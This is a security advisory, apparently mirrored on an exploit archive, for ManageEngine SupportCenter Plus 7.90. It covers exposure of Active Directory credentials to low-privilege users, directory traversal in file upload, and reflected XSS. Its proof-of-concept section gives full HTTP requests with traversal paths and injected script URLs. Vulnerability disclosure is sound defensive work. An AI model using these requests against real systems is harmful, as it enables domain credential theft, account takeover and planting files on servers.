ManageEngine SupportCenter Plus 7.90 - Multiple Vulnerabilities

2015-06-20T00:00:00
ID 1337DAY-ID-23775
Type zdt
Reporter bot
Modified 2015-06-20T00:00:00

Description

Exploit for multiple platform in category web applications

                                        
                                            Document Title:
===============
ManageEngine SupportCenter Plus 7.90 - Multiple Vulnerabilities

Product & Service Introduction:
===============================
SupportCenter Plus is a web-based customer support software that lets organizations effectively manage customer tickets, their account and 
contact information, the service contracts and in the process providing a superior customer experience. SupportCenter Plus is commonly deployed on 
internet accessible interfaces to allow customers to access the application. This common deployment scenario often involves a combination of 
low privilege accounts for customers (typically local authentication) and higher privilege accounts for help desk stuff (typically Active Directory 
integrated). Note that it is not unusual to allow any internet user to be able to register a low privilege account. This deployment scenario is 
important to consider when evaluating the risk of the below vulnerabilities.
 
(Copy of the Vendor Homepage: https://www.manageengine.com/products/support-center/ )
 
 
Abstract Advisory Information:
==============================
An indepndent vulnerability researcher discovered multiple vulnerabilities in the official ManageEngine SupportCenter Plus v7.90 web-application.

Affected Product(s):
====================
Manage Engine
Product: SupportCenter Plus - Web Application 7.90

Technical Details & Description:
================================
1.1 Improper authentication disclosing password (Authenticated)
Missing user access control mechanisms allow low privilege users to gain unauthorised access to sensitive Active Directory integration functionality normally only accessibly by Administrators. 
This functionality allows a low privilege user to:
1.) Retrieve the plain text user name and password for the domain account (typically Domain Administrator or similar) used to integrate with Active Directory
2.) Configure arbitrary domains to be used for authentication and import users from these domains (overwriting existing user records)
 
A low privilege user in SupportCenter Plus can gain privileged access to both the application and any integrated domains. Typical attack scenarios could include:
1.) SupportCenter Plus is accessible via the internet. An internet based attacker who can gain access to a low privilege account (registering an account if enabled or stealing an account) can gain access to highly privileged domain credentials. The attacker can then use these credentials to gain remote access to the organisation through other means (e.g. VPNs or physically in a meeting room at the organisation).
2.) SupportCenter Plus is not accessible via the internet. An attacker who has gained a low level of compromise in an organisation (i.e. any user who can access SupportCenter Plus) can use these vulnerabilities to escalate themselves to domain administrator or similar.
 
Pre-requisites and considerations include:
 - In order to steal existing domain credentials it is necessary for Active Directory integration to have been setup.
 - In order to import users from an attacker controlled domain it is necessary for the SupportCenter Plus server to have network connectivity to the attacker server (i.e. firewall rules may prevent this)
 - It is possible to login to SupportCenter Plus using domain authentication even when this option is hidden (typically done so that the domain name isn`t displayed on the internet accessible login)
 
 
  
1.2 Directory traversal on file upload (Authenticated)
Low privilege users have the ability to attach files to work order requests (e.g. to attach a screenshot). 
This functionality is vulnerable to directory traversal and allows low privilege users to upload files to arbitrary directories.
 
Potential impacts of this vulnerability include:
1.) Remote code execution ***
2.) Denial of service
3.) Uploading malicious static content to web accessible directories (e.g. JavaScript, malware etc)
 
*** There are two key limitations to this vulnerability that limit any easily exploitable method for code execution through exploiting the underlying JBoss environment:
1.) A Java compiler is not installed as part of SupportCenter Plus which prevents uploaded JSP files from being executed
2.) The uploaded directory always appends an additional directory (named after the user`s ID) which prevents deployment of a packaged or unpackaged WAR file (or similar)
 
Despite the above limitations I cannot con conclusively determine that code execution is not possible.
 
 
 
1.3 Reflected cross site scripting (Authenticated)
Multiple authenticated reflected cross site scripting vulnerabilities exist in SupportCenter Plus.
 
Unsanitised user provided input in the `query` parameter is echoed back to the user during requests to /CustomReportHandler.do.
Only administrators (or similar highly privileged) users with access to the custom report functionality are vulnerable to this attack vector.
 
Unsanitised user provided input in the `compAcct` parameter is echoed back to user during requests to /jsp/ResetADPwd.jsp.
Unsanitised user provided input in the `redirectTo` parameter is echoed back to user during requests to /jsp/CacheScreenWidth.jsp.
All authenticated users are vulnerable to these attack vectors.
 
 
 
Proof of Concept (PoC):
=======================
1.1
The vulnerability can be exploited by remote attackers without user interaction. 
For security demonstration or to reproduce follow the provided information and steps below.
 
Manual steps to reproduce the vulnerability ...
1.) Set up a Active Directory domain
2.) Install SupportCenter Plus
3.) Login as an administrator and add a Windows domain and associated credentials
4.) Logout and login as a low privilege user (by default there is guest/guest account)
5.) Attempt to access the above URLs and observe that you can access the functionality with no restrictions
(e.g. browse to http://[VULNERABLE]/EditDomain.do?action=editWindowsDomain&windowsDomainID=1&SUBREQUEST=XMLHTTP and view the password in the HTML source code)
 
 
Plain text domain credentials can be viewed in the HTML source code of the following pages when logged in as low privilege user:
http://[VULNERABLE]/EditDomain.do?action=editWindowsDomain&windowsDomainID=1&SUBREQUEST=XMLHTTP
http://[VULNERABLE]/ImportADUsers.do
 
Additional domains can be added through browsing to http://[VULNERABLE]/ImportADUsers.do?action=editWindowsDomain&windowsDomainID=1&SUBREQUEST=XMLHTTP and then selecting "Add New Domain" which will allow you to enter the domain details resulting in a POST similar to this:
 
    POST /EditDomain.do?SUBREQUEST=XMLHTTP HTTP/1.1
    Host: [VULNERABLE]
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: application/x-www-form-urlencoded;charset=UTF-8
    Referer: http://[VULNERABLE]:9090/AdminHome.do
    Content-Length: 181
    Cookie: [object HTMLTableRowElement]=show; [object HTMLDivElement]=show; [object HTMLTableCellElement]=show; 3Adminhelpexp=helpexpshow; 3Adminhelpcoll=helpcollhide; JSESSIONID=C14EA9B74F5D5C7B2F3055EA96F71188; PREV_CONTEXT_PATH=; JSESSIONIDSSO=391CCA5D883203EBE1CD84BEFCB26144
    Connection: keep-alive
    Pragma: no-cache
    Cache-Control: no-cache
 
    name=TESTDOMAIN&isPublicDomain=on&domainController=CONTROLLER&loginName=Administrator&password=Password123&id=1&addButton=&cancel=Cancel&updateButton=Save&cancel=Cancel&description=
 
Domain users can be imported by browsing to http://[VULNERABLE]/ImportADUsers.do selecting the domain and clicking next. You can then select the Operation Units (OUs) you want to import from the domain and click "Start Import" resulting in a POST similar to this:
 
    POST /ImportADUsers.do HTTP/1.1
    Host: [VULNERABLE]
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:37.0) Gecko/20100101 Firefox/37.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://[VULNERABLE]:9090/ImportADUsers.do
    Cookie: [object HTMLTableRowElement]=show; [object HTMLDivElement]=show; [object HTMLTableCellElement]=show; PREV_CONTEXT_PATH=; JSESSIONID=96062390B861F5901A937CE3A71A8F4D; JSESSIONIDSSO=C5CBE9C1CB90CEA338318B903BEDE26A; 3Adminhelpexp=helpexpshow; 3Adminhelpcoll=helpcollhide
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 193
     
    selectedOUs=2&importUser=Start+Import&selectOUs=Next&serverName=CONTROLLER&domainName=TESTDOMAIN&userName=Administrator&userPassword=password123&isRefresh=true&phone=true&mobile=true&job=true&email=true
 
 
 
1.2
The vulnerability can be exploited by remote attackers without user interaction. 
For security demonstration or to reproduce follow the provided information and steps below.
 
Files are uploaded via a POST request to /workorder/Attachment.jsp?component=Request
 
It is possible to manipulate the "module" parameters to traverse directories. Decompiled source code of the creation of the file path is shown below:
    String filePath1 = "Attachments" + filSep + module + filSep + userID1
 
Note that an additional directory (named after the user's ID) is always appended to file path.
 
In the below example POST a module value of ../../../../../../../../../../../../ is specified and the logged in user has an ID value of 2.
 
The resulting file in this case is uploaded to c:\2\payload.html on a Windows environment.
 
 
An example POST request is shown below:
    POST /workorder/Attachment.jsp?component=Request HTTP/1.1
    Host: [VULNERABLE]:9090
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:37.0) Gecko/20100101 Firefox/37.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://[VULNERABLE]:9090/workorder/Attachment.jsp?component=Request
    Cookie: [object HTMLTableRowElement]=show; [object HTMLDivElement]=show; [object HTMLTableCellElement]=show; PREV_CONTEXT_PATH=/custom; JSESSIONID=DCB297647A29281C4E80C76898B4B09A; 3Adminhelpexp=helpexpshow; 3Adminhelpcoll=helpcollhide; domainName=TESTDOMAIN; JSESSIONIDSSO=A1E2CBF658231DF263F84A994E27F536
    Connection: keep-alive
    Content-Type: multipart/form-data; boundary=---------------------------17390486101970088239358532669
    Content-Length: 1110
 
    -----------------------------17390486101970088239358532669
    Content-Disposition: form-data; name="filePath"; filename="payload.html"
    Content-Type: application/octet-stream
 
    test12345
 
    -----------------------------17390486101970088239358532669
    Content-Disposition: form-data; name="filename"
 
    payload.html
    -----------------------------17390486101970088239358532669
    Content-Disposition: form-data; name="vecPath"
 
 
    -----------------------------17390486101970088239358532669
    Content-Disposition: form-data; name="vec"
 
 
    -----------------------------17390486101970088239358532669
    Content-Disposition: form-data; name="theSubmit"
 
    AttachFile
    -----------------------------17390486101970088239358532669
    Content-Disposition: form-data; name="formName"
 
    null
    -----------------------------17390486101970088239358532669
    Content-Disposition: form-data; name="component"
 
    ../../../../../../../../../../../../
    -----------------------------17390486101970088239358532669
    Content-Disposition: form-data; name="ATTACH"
 
    Attach
    -----------------------------17390486101970088239358532669--
 
 
     
     
1.3
The cross site scripting web vulnerability can be exploited by remote attackers with low or medium user interaction. 
For security demonstration or to reproduce follow the provided information and steps below.
 
Administrator user only:
http://[VULNERABLE]:9090/CustomReportHandler.do?module=run_query_editor_query&reportTitle=test&query=<BODY%20ONLOAD=alert(1)>
 
Any authenticated user:
http://[VULNERABLE]:9090/jsp/ResetADPwd.jsp?compAcct=%22%3E%3CIFRAME%20SRC=%22http://www.google.com%22%3E%3C/IFRAME%3E
http://[VULNERABLE]:9090/jsp/CacheScreenWidth.jsp?width=1600&redirectTo=";alert(1);//
 
 
Security Risk:
==============
1.1
The security risk of the authentication disclosing password vulnerability is estimated as high. (CVSS 6.9)
 
1.2
The security risk of the directory traversal web vulnerability is estimated as high. (CVSS 5.9)
 
1.3
The security risk of the cross site scripting web vulnerabilities are estimated as medium. (CVSS 3.3)

#  0day.today [2016-04-19]  #